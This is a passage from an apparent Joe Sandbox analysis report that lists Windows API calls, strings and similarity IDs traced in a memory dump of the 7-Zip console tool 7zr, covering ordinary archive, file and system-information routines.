                            • GetTickCount.KERNEL32 ref: 00CA6578
                            • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 00CA65C5
                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00CA65EC
                              • Part of subcall function 00CA5D7A: __EH_prolog.LIBCMT ref: 00CA5D7F
                              • Part of subcall function 00CA5D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00CA5DA1
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Strings
                            Similarity
                            • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                            • String ID: .tmp$d
                            • API String ID: 1989517917-2797371523
                            APIs
                            Strings
                            Similarity
                            • API ID: fputs
                            • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                            • API String ID: 1795875747-657955069
                            APIs
                            Strings
                            Similarity
                            • API ID: H_prologfputs
                            • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                            • API String ID: 1798449854-1259944392
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CAA091
                              • Part of subcall function 00CA9BAA: RegCloseKey.ADVAPI32(?,?,00CA9BA0), ref: 00CA9BB6
                            Strings
                            Similarity
                            • API ID: CloseH_prolog
                            • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                            • API String ID: 1579395594-270022386
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD46D4
                            • EnterCriticalSection.KERNEL32(00D62918), ref: 00CD46E8
                            • CompareFileTime.KERNEL32(?,?), ref: 00CD4712
                            • LeaveCriticalSection.KERNEL32(00D62918), ref: 00CD476A
                            Strings
                            Similarity
                            • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                            • String ID: v
                            • API String ID: 3800395459-3261393531
                            APIs
                            • memset.MSVCRT ref: 00D003F5
                            • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 00D00490
                            • memset.MSVCRT ref: 00D00618
                            Strings
                            Similarity
                            • API ID: memset$memcpy
                            • String ID: $@
                            • API String ID: 368790112-1077428164
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA6141
                              • Part of subcall function 00CA6C72: __EH_prolog.LIBCMT ref: 00CA6C77
                            • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 00CA6197
                            • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00CA626E
                            • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 00CA62A9
                              • Part of subcall function 00CA6096: __EH_prolog.LIBCMT ref: 00CA609B
                              • Part of subcall function 00CA6096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00CA60DF
                            • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00CA6285
                            Similarity
                            • API ID: ErrorLast$H_prolog$DeleteFile
                            • String ID:
                            • API String ID: 3586524497-0
                            APIs
                            • memcmp.MSVCRT(?,00D548A0,00000010), ref: 00CB44DB
                            • memcmp.MSVCRT(?,00D50128,00000010), ref: 00CB44EE
                            • memcmp.MSVCRT(?,00D50228,00000010), ref: 00CB450B
                            • memcmp.MSVCRT(?,00D50248,00000010), ref: 00CB4528
                            • memcmp.MSVCRT(?,00D501C8,00000010), ref: 00CB4545
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            APIs
                            Strings
                            Similarity
                            • API ID: H_prolog
                            • String ID: !$LZMA2:$LZMA:
                            • API String ID: 3519838083-3332058968
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CAA389
                              • Part of subcall function 00CAA4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,00CAA3C1,00000001), ref: 00CAA4CD
                              • Part of subcall function 00CAA4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00CAA4DD
                            Strings
                            Similarity
                            • API ID: AddressH_prologHandleModuleProc
                            • String ID: : $ SP:$Windows
                            • API String ID: 786088110-3655538264
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD602A
                            • EnterCriticalSection.KERNEL32(00D62938), ref: 00CD6044
                            • LeaveCriticalSection.KERNEL32(00D62938), ref: 00CD6060
                            Strings
                            Similarity
                            • API ID: CriticalSection$EnterH_prologLeave
                            • String ID: v
                            • API String ID: 367238759-3261393531
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,00CAA3C1,00000001), ref: 00CAA4CD
                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00CAA4DD
                            Strings
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: RtlGetVersion$ntdll.dll
                            • API String ID: 1646373207-1489217083
                            APIs
                            • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 00CC0359
                            • GetLastError.KERNEL32(?,?,00000000,?), ref: 00CC0382
                            • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 00CC03DA
                            • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 00CC03F0
                            Similarity
                            • API ID: ErrorFileLastSecurity
                            • String ID:
                            • API String ID: 555121230-0
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA8300
                            • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00CA834F
                            • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 00CA837C
                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 00CA839B
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Similarity
                            • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                            • String ID:
                            • API String ID: 1689166341-0
                            APIs
                            Strings
                            Similarity
                            • API ID: H_prolog
                            • String ID: BlockPackSize$BlockUnpackSize
                            • API String ID: 3519838083-5494122
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CAA4F8
                              • Part of subcall function 00CAA384: __EH_prolog.LIBCMT ref: 00CAA389
                              • Part of subcall function 00CA9E14: GetSystemInfo.KERNEL32(?), ref: 00CA9E36
                              • Part of subcall function 00CA9E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00CA9E50
                              • Part of subcall function 00CA9E14: GetProcAddress.KERNEL32(00000000), ref: 00CA9E57
                            • strcmp.MSVCRT ref: 00CAA564
                            Strings
                            Similarity
                            • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                            • String ID: -
                            • API String ID: 2798778560-3695764949
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0$x
                            • API String ID: 3519838083-1948001322
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: =
                            • API String ID: 1795875747-2525689732
                            APIs
                            • memcmp.MSVCRT(?,00D548A0,00000010), ref: 00D041D6
                            • memcmp.MSVCRT(?,00D50168,00000010), ref: 00D041F1
                            • memcmp.MSVCRT(?,00D501E8,00000010), ref: 00D04205
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0